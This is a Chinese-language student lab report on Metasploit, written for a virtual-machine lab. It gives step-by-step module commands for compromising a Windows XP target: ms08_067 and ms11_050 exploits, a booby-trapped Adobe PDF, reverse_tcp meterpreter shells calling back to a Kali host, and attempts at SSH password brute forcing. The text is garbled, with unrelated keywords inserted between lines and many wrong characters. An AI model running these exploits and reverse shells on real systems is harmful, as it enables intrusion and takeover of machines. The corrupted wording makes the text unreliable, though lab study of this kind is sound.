查找关于ms08_067的渗透模块
html
exploit/windows/smb/ms08_067_netapi
显示攻击载荷,能够用这个shell_bind_tcp
shell
show targets
看一下能够被攻击的靶机的操做系统set payload generic/shell_reverse_tcp
设置攻击有效载荷。查看当前设置,要将RHOST设置为XP的IP;将LHOST设为kali的IP
set LHOST "kali Ip" set RHOST "Win xp Ip"
windows
以后exploit
能够获取其shellapi
回到ms08_067_netapi模块界面浏览器
set payload windows/meterpreter/reverse_tcp
use windows/browser/ms11_050_mshtml_cobjectelement
可查看信息info
以及目标浏览器targets
安全
set payload windows/meterpreter/reverse_tcp
show options
(将LHOST设为kali的IP、set LPORT xxx set URIPATH xxx)
网络
完成exploit
XP访问底下的网址
session
此时kali中session已建立
ssh
使用命令sessions -i 1
开始链接,并成功获得shell
tcp
实验步骤:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
show options
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
设置相关信息
生成其pdf,将pdf拷贝到靶机中
使用命令exploit开始攻击,在xp中打开pdf。
此时kali中能够看见
已成功夺权
看看靶机里的tcp链接
使用show auxiliary
查看辅助模块
我首先选择了这个漏洞,百度以后是进行远程ssl帐号口令的破解。
首先使用use auxiliary/scanner/ssh/ssh_login
查看其配置信息(还配置了pass.txt,和user.txt)
可是run以后一直出错
(百度说Windows下msf安装好之后,直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目录下,直接放到c:\下面不行 只能放到msf3目录下,我觉得直接把生成的文件拷贝过去就行,首先我没找到生成的文件...而后我把ip改成kali的,仍是报错)
仍是看一下scanner/http/ssl
咱们更改了目标主机设为同一网段的,再次扫描...未果
又更改了其线程...仍未果
仍是作最容易的nmap扫面,看看其开放端口吧
仍是不太甘心,又作了一下arp_sweep
填好其设置信息之后使用run 开始扫描。可看到链接状况。
(1)用本身的话解释什么是exploit,payload,encode.
exploit
:就是发起渗透攻击,当你能够得到靶机shell或者作一些夺权的准备以后的最后一个run。payload
就是咱们在作渗透攻击中用到的shellcode,能够破坏程序正常运行的代码。encode
假装病毒的一种手段——编码经过本次实验,我首先掌握了经过msf如何查看各类各样的安全漏洞,再经过一个漏洞的分类进行攻击。大体步骤为:
show auxiliary
search xxx
(能够看到分别表示的模块类型、目标平台、目标服务、模块名字)show payloads
可查看攻击载荷的类型,选择运行后门show options
查看配设渗透攻击所须要的配置选项。yes
为必须配设的经过set xxx xxxx
来配设show targets
来看看相应的受害者是啥show options
确认一下exploit
发起进攻。本次实验难度方面不是特别大,主要考察你虚拟机能不能行,哎,一直在百分之93的状态下作完了实验,最后也分不清0 8 和o 了。。。